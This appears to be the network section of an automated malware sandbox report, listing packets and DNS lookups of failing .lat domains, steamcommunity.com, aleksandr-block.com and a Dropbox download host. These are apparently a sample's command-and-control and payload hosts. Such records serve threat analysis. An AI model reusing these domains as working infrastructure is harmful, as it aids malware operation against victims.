Jan 14, 2025 08:55:32.267436981 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.323493958 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.323508978 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.323524952 CET	49733	443	192.168.2.4	104.102.49.254
Jan 14, 2025 08:55:32.323533058 CET	443	49733	104.102.49.254	192.168.2.4
Jan 14, 2025 08:55:32.405230999 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:32.405291080 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:32.405419111 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:32.410285950 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:32.410300970 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:32.904623985 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:32.904742002 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:32.906723976 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:32.906757116 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:32.907329082 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:32.909004927 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:32.909090996 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:32.909121990 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.334479094 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.334580898 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.334636927 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.334849119 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.334856987 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.334868908 CET	49736	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.334872961 CET	443	49736	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.366347075 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.366374016 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.366460085 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.366800070 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.366816998 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.859039068 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.859114885 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.860682964 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.860691071 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.861180067 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:33.874711037 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.874788046 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:33.874881983 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.339206934 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.339289904 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.339443922 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.339535952 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.339569092 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.339584112 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.339611053 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.339704990 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.339783907 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.339792967 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.339826107 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.339984894 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.340071917 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.340126991 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.340126991 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.340145111 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.343878984 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.343990088 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.344003916 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.417026997 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.429739952 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.429850101 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.430044889 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.430058956 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.430084944 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.430181980 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.430181980 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.430234909 CET	49739	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.430248976 CET	443	49739	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.783154964 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.783186913 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:34.783334970 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.784233093 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:34.784255028 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:35.259424925 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:35.259532928 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:35.260677099 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:35.260689974 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:35.260921955 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:35.269361019 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:35.269486904 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:35.269520044 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:35.270467997 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:35.270481110 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:35.890855074 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:35.890974045 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:35.891138077 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:35.891292095 CET	49741	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:35.891314983 CET	443	49741	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:36.073322058 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:36.073373079 CET	443	49743	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:36.073522091 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:36.073885918 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:36.073900938 CET	443	49743	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:36.553230047 CET	443	49743	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:36.553309917 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:36.554555893 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:36.554578066 CET	443	49743	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:36.554908037 CET	443	49743	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:36.564038038 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:36.564152956 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:36.564153910 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:36.564218998 CET	443	49743	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.016316891 CET	443	49743	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.016443968 CET	443	49743	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.017044067 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.021975994 CET	49743	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.022001982 CET	443	49743	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.477324963 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.477371931 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.477767944 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.477768898 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.477842093 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.938060045 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.938188076 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.942064047 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.942070961 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.942317009 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.943516970 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.943655014 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.943690062 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:37.943747997 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:37.943758011 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:38.567297935 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:38.567420006 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:38.567513943 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:38.567596912 CET	49744	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:38.567610979 CET	443	49744	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:38.875880957 CET	49745	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:38.875940084 CET	443	49745	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:38.876005888 CET	49745	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:38.876542091 CET	49745	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:38.876553059 CET	443	49745	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:39.335136890 CET	443	49745	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:39.335375071 CET	49745	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:39.336493969 CET	49745	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:39.336533070 CET	443	49745	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:39.336787939 CET	443	49745	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:39.337989092 CET	49745	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:39.338071108 CET	49745	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:39.338083982 CET	443	49745	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:39.757678986 CET	443	49745	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:39.757927895 CET	443	49745	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:39.758019924 CET	49745	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:39.758073092 CET	49745	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:39.758086920 CET	443	49745	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.245676994 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.245701075 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.245770931 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.246341944 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.246356964 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.703002930 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.703145027 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.705091953 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.705105066 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.705455065 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.745826006 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.823091984 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.828214884 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.828304052 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.828430891 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.828502893 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.828594923 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.828794956 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.828902960 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.828934908 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.829051018 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.829077959 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.829196930 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.829226017 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.829238892 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.829291105 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.829358101 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.829394102 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.829395056 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.829514027 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.829515934 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.829540968 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.829586029 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.829633951 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.829741955 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.829771996 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.838805914 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.838901997 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.838922024 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.839010954 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.839015007 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.839092970 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:40.839109898 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.839287043 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:40.843827009 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:42.730504990 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:42.730611086 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:42.733922005 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:42.733999014 CET	49746	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:42.734013081 CET	443	49746	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:42.782891035 CET	49747	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:42.782947063 CET	443	49747	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:42.783030987 CET	49747	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:42.783435106 CET	49747	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:42.783447027 CET	443	49747	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:43.243558884 CET	443	49747	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:43.243712902 CET	49747	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:43.245172977 CET	49747	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:43.245184898 CET	443	49747	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:43.245507002 CET	443	49747	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:43.246674061 CET	49747	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:43.246700048 CET	49747	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:43.246759892 CET	443	49747	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:43.688877106 CET	443	49747	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:43.689001083 CET	443	49747	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:43.689052105 CET	49747	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:43.689415932 CET	49747	443	192.168.2.4	188.114.96.3
Jan 14, 2025 08:55:43.689430952 CET	443	49747	188.114.96.3	192.168.2.4
Jan 14, 2025 08:55:43.699908018 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:43.699930906 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:43.699990034 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:43.700567007 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:43.700581074 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:44.343542099 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:44.343650103 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:44.347095013 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:44.347109079 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:44.347582102 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:44.348715067 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:44.395337105 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:45.153661966 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:45.153773069 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:45.153785944 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:45.153829098 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:45.153836966 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:45.153879881 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:45.154746056 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:45.154766083 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:45.154778957 CET	49748	443	192.168.2.4	162.125.66.18
Jan 14, 2025 08:55:45.154784918 CET	443	49748	162.125.66.18	192.168.2.4
Jan 14, 2025 08:55:45.176477909 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:45.176531076 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:45.176613092 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:45.176938057 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:45.176950932 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:45.867470026 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:45.867569923 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:45.867597103 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:45.867779016 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:45.922319889 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:45.922348022 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:45.922648907 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:45.924083948 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:45.967349052 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:46.186175108 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:46.229500055 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:46.229528904 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:46.270169973 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:46.270210028 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:46.270236015 CET	49749	443	192.168.2.4	162.125.66.15
Jan 14, 2025 08:55:46.270890951 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:46.270991087 CET	443	49749	162.125.66.15	192.168.2.4
Jan 14, 2025 08:55:46.271047115 CET	49749	443	192.168.2.4	162.125.66.15

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 08:55:30.725883961 CET	57981	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:30.737114906 CET	53	57981	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:30.742563009 CET	53856	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:30.753186941 CET	53	53856	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:30.756217003 CET	50889	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:30.767072916 CET	53	50889	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:30.769691944 CET	51038	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:30.780189037 CET	53	51038	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:30.781550884 CET	61267	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:30.790572882 CET	53	61267	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:30.792946100 CET	55019	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:30.802067041 CET	53	55019	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:30.804464102 CET	64348	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:30.813869953 CET	53	64348	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:30.817886114 CET	51897	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:30.827022076 CET	53	51897	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:30.829286098 CET	62553	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:30.835891962 CET	53	62553	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:32.351737022 CET	52837	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:32.395850897 CET	53	52837	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:43.691689014 CET	50770	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:43.698949099 CET	53	50770	1.1.1.1	192.168.2.4
Jan 14, 2025 08:55:45.156117916 CET	61328	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:55:45.175246954 CET	53	61328	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 08:55:30.725883961 CET	192.168.2.4	1.1.1.1	0x8123	Standard query (0)	shoefeatthe.lat	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.742563009 CET	192.168.2.4	1.1.1.1	0xa674	Standard query (0)	bloodyswif.lat	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.756217003 CET	192.168.2.4	1.1.1.1	0x5b16	Standard query (0)	washyceehsu.lat	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.769691944 CET	192.168.2.4	1.1.1.1	0xc841	Standard query (0)	leggelatez.lat	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.781550884 CET	192.168.2.4	1.1.1.1	0xa3a4	Standard query (0)	miniatureyu.lat	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.792946100 CET	192.168.2.4	1.1.1.1	0xa542	Standard query (0)	kickykiduz.lat	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.804464102 CET	192.168.2.4	1.1.1.1	0xa4a3	Standard query (0)	savorraiykj.lat	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.817886114 CET	192.168.2.4	1.1.1.1	0x9197	Standard query (0)	finickypwk.lat	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.829286098 CET	192.168.2.4	1.1.1.1	0x3d6b	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:32.351737022 CET	192.168.2.4	1.1.1.1	0xde70	Standard query (0)	aleksandr-block.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:43.691689014 CET	192.168.2.4	1.1.1.1	0x12d2	Standard query (0)	www.dropbox.com	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:45.156117916 CET	192.168.2.4	1.1.1.1	0xd54c	Standard query (0)	ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 08:55:30.737114906 CET	1.1.1.1	192.168.2.4	0x8123	Name error (3)	shoefeatthe.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.753186941 CET	1.1.1.1	192.168.2.4	0xa674	Name error (3)	bloodyswif.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.767072916 CET	1.1.1.1	192.168.2.4	0x5b16	Name error (3)	washyceehsu.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.780189037 CET	1.1.1.1	192.168.2.4	0xc841	Name error (3)	leggelatez.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.790572882 CET	1.1.1.1	192.168.2.4	0xa3a4	Name error (3)	miniatureyu.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.802067041 CET	1.1.1.1	192.168.2.4	0xa542	Name error (3)	kickykiduz.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.813869953 CET	1.1.1.1	192.168.2.4	0xa4a3	Name error (3)	savorraiykj.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.827022076 CET	1.1.1.1	192.168.2.4	0x9197	Name error (3)	finickypwk.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:30.835891962 CET	1.1.1.1	192.168.2.4	0x3d6b	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:32.395850897 CET	1.1.1.1	192.168.2.4	0xde70	No error (0)	aleksandr-block.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:32.395850897 CET	1.1.1.1	192.168.2.4	0xde70	No error (0)	aleksandr-block.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:43.698949099 CET	1.1.1.1	192.168.2.4	0x12d2	No error (0)	www.dropbox.com	www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 08:55:43.698949099 CET	1.1.1.1	192.168.2.4	0x12d2	No error (0)	www-env.dropbox-dns.com		162.125.66.18	A (IP address)	IN (0x0001)	false
Jan 14, 2025 08:55:45.175246954 CET	1.1.1.1	192.168.2.4	0xd54c	No error (0)	ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 08:55:45.175246954 CET	1.1.1.1	192.168.2.4	0xd54c	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.66.15	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

aleksandr-block.com

www.dropbox.com

ucce955c8a65c485056ac17b3662.dl.dropboxusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
